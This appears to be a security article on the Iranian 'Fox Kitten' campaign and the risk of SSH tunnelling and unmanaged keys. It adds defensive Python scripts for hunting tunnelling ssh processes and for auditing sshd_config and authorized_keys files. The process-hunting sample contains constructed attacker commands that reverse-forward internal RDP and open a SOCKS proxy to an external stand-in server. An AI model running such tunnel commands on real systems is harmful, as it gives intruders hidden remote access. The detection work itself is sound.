According to a ClearSky research report, a widespread Iranian offensive campaign, dubbed the “Fox Kitten Campaign”, was uncovered during the last quarter of 2019. The campaign has been conducted over the last three years against dozens of companies and organizations in Israel and around the world. Through the campaign, the attackers succeeded in gaining access to, and a persistent foothold in, the networks of numerous companies and organizations in the IT, telecommunication, oil and gas, aviation, government, and security sectors around the world.
The research company estimates that the campaign is among Iran’s most continuous and comprehensive campaigns revealed until now. Aside from malware, the campaign encompasses an entire infrastructure dedicated to ensuring a long-lasting capability to control and fully access the targets chosen by the Iranians. Although the revealed campaign was used as reconnaissance infrastructure, it can also be used as a platform for spreading and activating destructive malware.
According to the analysis, Fox Kitten’s objectives were to:
The campaign has used a range of tools, including some based on open-source code and some custom weapons.
The initial infection vector has been the exploitation of recently disclosed vulnerabilities in VPN appliances from several vendors: Pulse Secure VPN (CVE-2019-11510), Fortinet FortiOS VPN (CVE-2018-13379) and Palo Alto Networks GlobalProtect (CVE-2019-1579).
The researchers assess “this attack vector to be significant also in 2020 apparently by exploiting new vulnerabilities in VPNs and other remote systems (such as the latest one existing in Citrix). Iranian APT groups have developed good technical offensive capabilities and are able to exploit ‘one-day’ vulnerabilities in relatively short periods of time, starting from several hours to a week or two.”
Upon gaining a foothold at the target, the attackers tried to maintain access to the networks via a variety of communication tools, including opening Remote Desktop (RDP) sessions over SSH tunnels in order to camouflage and encrypt the communication with the targets. They also installed a set of remote access and communication tools, tools designed for privilege escalation, and several backdoors on the systems they had compromised.
The reliance on encrypted remote-access channels such as VPN, SSH tunnels and RDP is savvy, the researchers noted: “The time needed to identify an attacker on a compromised network is long and varies between months to not at all. The existing monitoring capability for organizations to identify and block an attacker that entered through remote communication tools is difficult, to impossible.”
At the final stage, after successfully infiltrating the organization, the attackers “performed a routine process of identification, examination and filtering of sensitive, valuable information from every targeted organization,” according to the report. “The valuable information was sent back to the attackers for reconnaissance, espionage or further infection of connected networks.”
SSH tunneling is a method of transporting arbitrary networking data over an encrypted SSH connection. It can be used to add encryption to legacy applications. It can also be used to implement VPNs and access intranet services across firewalls.
SSH is the standard used for secure remote logins and file transfers over untrusted networks. It also provides a way to secure the data traffic of any given application using port forwarding, basically tunneling any TCP/IP port over SSH. This means that the application data traffic is directed to flow inside an encrypted SSH connection so that it cannot be eavesdropped or intercepted while it is in transit. SSH tunneling enables adding network security to legacy applications that do not natively support encryption.
As useful as SSH tunneling is, it also creates risk that needs to be addressed by corporate IT security teams. SSH connections are protected with strong encryption. This makes their content invisible to most deployed network monitoring and traffic filtering solutions. This invisibility carries considerable risk potential if it is exploited for malicious purposes such as data exfiltration. Cybercriminals or malware could exploit SSH tunnels to hide their unauthorized communications, or to exfiltrate stolen data from the target network.
In an SSH tunneling attack, the attacker sets up an SSH server outside the target network. Once the attacker is in the target system, for example by exploiting VPN vulnerabilities as in the Fox Kitten campaign, they connect from the inside out to that external SSH server. Most organizations permit outgoing SSH connections, at least when they have servers in a public cloud. The connection is set up with remote (reverse) port forwarding, so that a port on the external server is relayed back through the tunnel to a service on an internal host, for example an RDP or SSH port; the attacker then reaches the internal service simply by connecting to their own server. Setting up this SSH tunnel requires a single one-line command on the inside, and it can easily be automated. Because the perimeter only ever sees an outbound SSH session, most firewalls offer little to no protection against it.
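To make that one-line command visible from the defender's side, here is an added detection example; it is not from the ClearSky report or the original article. It scans the text of `ps -eo pid,user,args` for ssh client processes carrying forwarding options and rates them against an allow-list of expected destinations. The sample process list, the allow-list and every host name and address in it are constructed for the example; 203.0.113.9 plays the attacker's external server. The process to catch is the one with `-R`, which publishes an internal RDP port on that server, but the parser handles local (`-L`) and dynamic/SOCKS (`-D`) forwards as well, since the same technique hides command channels and proxying.

```python
"""Hunt for SSH client processes that carry port-forwarding options.

Input is the text of `ps -eo pid,user,args`. An outbound ssh with -R (reverse),
-D (SOCKS) or -L (local) forwarding to a host that is not on the allow-list is
the footprint of the tunnel technique described in the article.
"""
import shlex

# Constructed sample, not captured data: what a compromised jump host's
# process list might look like. 203.0.113.9 plays the attacker's server.
SAMPLE_PS = """\
  PID USER     ARGS
  812 root     /usr/sbin/sshd -D
 1433 backup   ssh -i /etc/backup/id_rsa backup@10.20.0.15 rsync --server
 2071 www-data ssh -fN -R 0.0.0.0:3389:10.20.0.42:3389 -p 443 svc@203.0.113.9
 2072 www-data ssh -o StrictHostKeyChecking=no -N -D 1080 svc@203.0.113.9
 2088 alice    ssh alice@bastion.corp.example
 2101 alice    ssh -L 8443:intranet.corp.example:443 alice@bastion.corp.example
"""

# Hosts an ssh client on this box is expected to talk to (assumed inventory).
ALLOWED_HOSTS = {"10.20.0.15", "bastion.corp.example"}

# ssh(1) options that consume an argument, per the OpenSSH synopsis. Needed so
# that option values are not mistaken for the destination host.
OPTS_WITH_ARG = set("BbcDEeFIiJLlmOopQRSWw")
FORWARD_FLAGS = {"L": "local forward", "R": "remote (reverse) forward",
                 "D": "dynamic/SOCKS forward", "w": "tun device"}
SENSITIVE_PORTS = {22: "ssh", 445: "smb", 3389: "rdp", 5985: "winrm"}


def parse_ssh_argv(argv):
    """Return (forwards, background, host) for an ssh command line.

    forwards is a list of (flag, spec); background is True when -f or -N is
    present (a tunnel-only session with no shell); host is the part after '@'
    of the first non-option word. Anything after the host is the remote
    command and is ignored.
    """
    forwards, background, host = [], False, None
    i = 1
    while i < len(argv):
        word = argv[i]
        if host is None and word.startswith("-") and len(word) > 1:
            flags = word[1:]
            for j, flag in enumerate(flags):
                if flag in OPTS_WITH_ARG:
                    # value is either glued on (-p443) or the next word (-p 443)
                    value = flags[j + 1:]
                    if not value:
                        i += 1
                        value = argv[i] if i < len(argv) else ""
                    if flag in FORWARD_FLAGS:
                        forwards.append((flag, value))
                    break
                if flag in ("f", "N"):
                    background = True
        elif host is None:
            host = word.rsplit("@", 1)[-1]
        i += 1
    return forwards, background, host


def analyse_ps(ps_text, allowed_hosts=ALLOWED_HOSTS):
    """Return one finding dict per ssh client process worth a look."""
    findings = []
    for line in ps_text.splitlines()[1:]:          # skip the header row
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        pid, user, args = int(parts[0]), parts[1], parts[2]
        argv = shlex.split(args)
        if not argv or argv[0].rsplit("/", 1)[-1] != "ssh":
            continue                                # sshd, scp, etc.
        forwards, background, host = parse_ssh_argv(argv)
        notes, severity = [], "info"
        if host not in allowed_hosts:
            notes.append(f"destination {host} not in allow-list")
            severity = "medium"
        for flag, spec in forwards:
            notes.append(f"{FORWARD_FLAGS[flag]}: {spec}")
            if flag == "R":
                # -R [bind:]port:target:targetport -- the tail names what the
                # remote side is now able to reach inside the network
                tail = spec.split(":")
                port = int(tail[-1]) if tail[-1].isdigit() else None
                if port in SENSITIVE_PORTS:
                    notes.append(f"exposes internal {SENSITIVE_PORTS[port]} on {tail[-2]}")
            if flag in ("R", "D") and host not in allowed_hosts:
                severity = "high"
        if background and forwards:
            notes.append("-f/-N: no shell requested, tunnel-only session")
        if notes:
            findings.append({"pid": pid, "user": user, "host": host,
                             "severity": severity, "notes": notes})
    return findings


if __name__ == "__main__":
    for f in analyse_ps(SAMPLE_PS):
        print(f"[{f['severity']:6}] pid {f['pid']} ({f['user']}) -> {f['host']}")
        for note in f["notes"]:
            print("         ", note)
```

On the sample the two www-data processes come out as high: an outbound session to an unknown host that both reverse-publishes 10.20.0.42:3389 and opens a SOCKS proxy, with no shell requested. The check is only as good as the process list it sees, so run it from an EDR or cron job on every host that is allowed outbound 22/443, and pair it with firewall egress logging: the attacker can rename the binary, but the open TCP session to their server still shows up.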
Combined with attacks based on unmanaged SSH keys, SSH tunneling allows an attacker to hide data exfiltration and command channels. Additionally, improperly managed SSH keys can be leveraged by attackers to penetrate the IT infrastructure and move freely across a network without detection. The compromise of one private key, or the installation of an attacker-controlled public key in an authorized_keys file, can be leveraged to set up hard-to-notice backdoors, bypass privileged access control solutions and perpetrate large-scale attacks and data breaches.
Improper SSH deployment (for example allowing tunneling where it is not needed, or leaving the obsolete SSH-1 protocol enabled) and poor key management can and will create significant vulnerabilities, which have been identified in NIST Interagency Report 7966 (NISTIR 7966), “Security of Interactive and Automated Access Management Using Secure Shell (SSH)”.
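As an added example (not taken from NISTIR 7966 or the original article), the following Python script audits an sshd_config for the forwarding-related directives that turn a compromised account into a tunnel endpoint, alongside a few baseline items. Two constructed configurations are embedded: a weak one and a hardened one in which forwarding is off globally and re-enabled only for one group, limited by PermitOpen. The directive names and defaults are those of OpenSSH 8.x; the Protocol check only matters for old servers that still know SSH-1; the host and group names are made up.

```python
"""Audit an sshd_config for the settings that let a compromised account turn
sshd into a tunnel, plus a few baseline items (root login, passwords, SSH-1).

Keyword handling follows sshd(8): keywords are case-insensitive, "Key value"
and "Key=value" are both accepted, lines starting with '#' are comments, and
for each keyword the first value found is the one used. Directives inside a
Match block apply only to matching connections and override the global value.
"""
import re

# OpenSSH 8.x defaults for the directives checked here (used when unset).
DEFAULTS = {
    "allowtcpforwarding": "yes", "gatewayports": "no", "permittunnel": "no",
    "allowagentforwarding": "yes", "x11forwarding": "no",
    "permitrootlogin": "prohibit-password", "passwordauthentication": "yes",
    "protocol": "2",
}
# Hardened baseline: forwarding off unless explicitly re-enabled per Match.
WANTED = {
    "allowtcpforwarding": "no", "gatewayports": "no", "permittunnel": "no",
    "allowagentforwarding": "no", "x11forwarding": "no",
    "permitrootlogin": "no", "passwordauthentication": "no",
}
FORWARDING_KEYS = ("allowtcpforwarding", "gatewayports", "permittunnel",
                   "allowagentforwarding")

# Constructed configurations (host and group names are made up).
WEAK_CONFIG = """\
Port 22
Protocol 2,1
PermitRootLogin yes
PasswordAuthentication yes
AllowTcpForwarding yes
GatewayPorts yes
PermitTunnel yes
"""

HARDENED_CONFIG = """\
Port 22
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
AllowTcpForwarding no
GatewayPorts no
PermitTunnel no
AllowAgentForwarding no
X11Forwarding no
# VERBOSE logs the key fingerprint used for each login
LogLevel VERBOSE
# Only jump-host admins may forward, and only to the intranet web front end
Match Group jump-admins
    AllowTcpForwarding local
    PermitOpen intranet.corp.example:443
"""


def parse_sshd_config(text):
    """Return (global_settings, match_blocks); match_blocks is a list of
    (criteria, settings). Keys are lower-cased; first occurrence wins."""
    global_settings, match_blocks, current = {}, [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = re.split(r"\s*=\s*|\s+", line, maxsplit=1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "match":
            current = {}
            match_blocks.append((value, current))
            continue
        target = current if current is not None else global_settings
        target.setdefault(key, value)
    return global_settings, match_blocks


def audit(text):
    """Return (findings, exceptions): global deviations from the baseline, and
    Match blocks that re-enable some form of forwarding."""
    settings, blocks = parse_sshd_config(text)
    findings = []
    for key, wanted in WANTED.items():
        actual = settings.get(key, DEFAULTS[key])
        if actual.lower() != wanted:
            origin = "set" if key in settings else "default"
            findings.append(f"{key} = {actual} ({origin}); baseline wants {wanted}")
    protocol = settings.get("protocol", DEFAULTS["protocol"])
    if "1" in protocol.split(","):
        findings.append(f"protocol = {protocol}: SSH-1 is cryptographically broken")
    exceptions = []
    for criteria, block in blocks:
        for key in FORWARDING_KEYS:
            if key in block and block[key].lower() != "no":
                scope = "" if "permitopen" in block else " (no PermitOpen limit)"
                exceptions.append(f"Match {criteria}: {key} {block[key]}{scope}")
    return findings, exceptions


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        findings, exceptions = audit(cfg)
        print(f"== {name}: {len(findings)} finding(s), {len(exceptions)} exception(s)")
        for line in findings + exceptions:
            print("  ", line)
```

Note that the weak configuration is flagged for AllowAgentForwarding even though it never mentions it: the OpenSSH default is yes, so an audit that only reads what is written misses it. On a live host, feed the script the output of `sshd -T`, which prints the effective value of every directive after defaults and includes are resolved.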
Since SSH is the primary secure access method used for administration and automated processes on mission critical systems, its security is crucial. The privileges granted to users and automated processes via SSH are typically elevated privileges. SSH keys enable automated connections to resources such as production servers, databases, routers, firewalls, disaster recovery systems, financial data, payment systems, intellectual property and patient information.
In many cases, users have been able to create and install keys without oversight or controls. This has led to violations of corporate access policies and to dangerous backdoors, which in turn facilitate the launch of successful attacks through the otherwise trusted encrypted tunnels.
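Finding those unmanaged keys is mostly a matter of reading every authorized_keys file on the estate and asking a few questions of each line. The following Python audit is an added example, not part of the original article: it decodes each key blob from the SSH wire format to recover the key type and size, computes the OpenSSH SHA256 fingerprint, and checks the option field for the restrictions that stop a stolen key from being used as a tunnel endpoint (`restrict` or `no-port-forwarding`, `from=`). It also reports DSA keys, short RSA keys, and one key authorized for more than one account. The accounts, comments and key blobs are constructed (valid wire format wrapped around placeholder numbers, not usable keys) so the script runs offline.

```python
"""Audit authorized_keys files for the unmanaged-key problems described above.

Each key blob is decoded from the SSH public-key wire format (length-prefixed
strings and mpints, RFC 4253 section 6.6) to recover type and size, the OpenSSH
SHA256 fingerprint is computed, and the option field is checked.
"""
import base64
import hashlib
import struct

def ssh_string(b):
    return struct.pack(">I", len(b)) + b

def ssh_mpint(n):   # big-endian, with a leading zero byte when the top bit is set
    return ssh_string(n.to_bytes((n.bit_length() + 8) // 8, "big"))

def read_string(buf, off):
    (length,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + length], off + 4 + length

def key_bits(keytype, blob):
    """Key size in bits from the blob (None for types not sized here)."""
    wire_type, off = read_string(blob, 0)
    if wire_type.decode() != keytype:
        raise ValueError(f"declared {keytype} but blob says {wire_type!r}")
    if keytype == "ssh-rsa":
        _e, off = read_string(blob, off)          # public exponent
        n, _ = read_string(blob, off)             # modulus
        return int.from_bytes(n, "big").bit_length()
    return 256 if keytype == "ssh-ed25519" else None

# Constructed sample keys: valid wire format around placeholder numbers, NOT
# usable keys. rsa_blob() yields a modulus of exactly `bits` bits.
def rsa_blob(bits, e=65537):
    return ssh_string(b"ssh-rsa") + ssh_mpint(e) + ssh_mpint((1 << (bits - 1)) | 0x12345)

def b64(blob):
    return base64.b64encode(blob).decode()

ED_BLOB = ssh_string(b"ssh-ed25519") + ssh_string(bytes(range(32)))
DSS_BLOB = ssh_string(b"ssh-dss") + ssh_mpint((1 << 1023) | 3)
RSA1024, RSA2048 = rsa_blob(1024), rsa_blob(2048)

SAMPLE_FILES = {   # account -> contents of its authorized_keys (constructed)
    "root": "\n".join([
        "# backup automation, pinned to a source network and a forced command",
        'restrict,from="10.20.0.0/16",command="/usr/local/bin/backup-shell" '
        f"ssh-ed25519 {b64(ED_BLOB)} backup@jump",
        f"ssh-rsa {b64(RSA1024)} dev-laptop-2015",
        f'from="203.0.113.9" ssh-rsa {b64(RSA2048)} svc-deploy',
    ]),
    "deploy": "\n".join([
        f"ssh-dss {b64(DSS_BLOB)} legacy-monitor",
        f"no-port-forwarding,no-agent-forwarding,no-X11-forwarding ssh-rsa {b64(RSA2048)} svc-deploy",
    ]),
}

KEY_TYPE_PREFIXES = ("ssh-rsa", "ssh-dss", "ssh-ed25519", "ecdsa-sha2-", "sk-")

def split_quoted(s, sep):
    """Split s on sep, honouring double quotes and backslash escapes."""
    out, cur, quoted, i = [], [], False, 0
    while i < len(s):
        c = s[i]
        if c == "\\" and i + 1 < len(s):
            cur.append(s[i + 1]); i += 2; continue
        if c == '"':
            quoted = not quoted
        elif c == sep and not quoted:
            out.append("".join(cur)); cur = []; i += 1; continue
        cur.append(c); i += 1
    out.append("".join(cur))
    return out

def split_line(line):
    """Return (options, keytype, base64_blob, comment) for one key line."""
    options = ""
    if not line.startswith(KEY_TYPE_PREFIXES):
        # the option field ends at the first whitespace outside double quotes
        i, quoted = 0, False
        while i < len(line) and (quoted or not line[i].isspace()):
            if line[i] == "\\":
                i += 1
            elif line[i] == '"':
                quoted = not quoted
            i += 1
        options, line = line[:i], line[i:].strip()
    fields = line.split(None, 2)
    return options, fields[0], fields[1], (fields[2] if len(fields) > 2 else "")

def audit_authorized_keys(files):
    """Return (entries, duplicates): per-key findings, and fingerprints that
    are authorized for more than one account."""
    entries, seen = [], {}
    for account, text in files.items():
        for raw in text.splitlines():
            line = raw.strip()
            if not line or line.startswith("#"):
                continue
            options, keytype, b64blob, comment = split_line(line)
            blob = base64.b64decode(b64blob)
            names = {o.split("=", 1)[0].lower() for o in split_quoted(options, ",") if o}
            fp = "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")
            bits = key_bits(keytype, blob)
            issues = []
            if not names & {"restrict", "no-port-forwarding"}:
                issues.append("port forwarding allowed (no restrict/no-port-forwarding)")
            if "from" not in names:
                issues.append("no from= source restriction")
            if keytype == "ssh-dss":
                issues.append("DSA key (disabled by default since OpenSSH 7.0)")
            if keytype == "ssh-rsa" and bits < 2048:
                issues.append(f"RSA modulus only {bits} bits")
            entries.append({"account": account, "comment": comment, "type": keytype,
                            "bits": bits, "fingerprint": fp, "issues": issues})
            seen.setdefault(fp, []).append(account)
    return entries, {fp: accts for fp, accts in seen.items() if len(accts) > 1}

if __name__ == "__main__":
    entries, duplicates = audit_authorized_keys(SAMPLE_FILES)
    for e in entries:
        print(e["account"], e["type"], e["comment"], e["fingerprint"], "; ".join(e["issues"]))
    for fp, accounts in duplicates.items():
        print("same key authorized for", ", ".join(accounts), fp)
```

The fingerprint is the same string `ssh-keygen -lf` prints, so findings can be matched against a key inventory or against the fingerprints sshd logs at LogLevel VERBOSE; a fingerprint that appears in the logs but not in the inventory is exactly the self-installed backdoor key the paragraph above describes. The sample shows the intended contrast: the root backup key with `restrict`, `from=` and a forced command produces no findings, while the 2015 laptop key is unrestricted, reachable from anywhere and only 1024 bits.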
Information security starts from controlling who is given access to systems, data and through which channels. If there is no control over access or the methods, there is no security, no confidentiality, no integrity, and no guarantees of continued operation.
How well is your organization monitoring and protecting your SSH deployment and keys?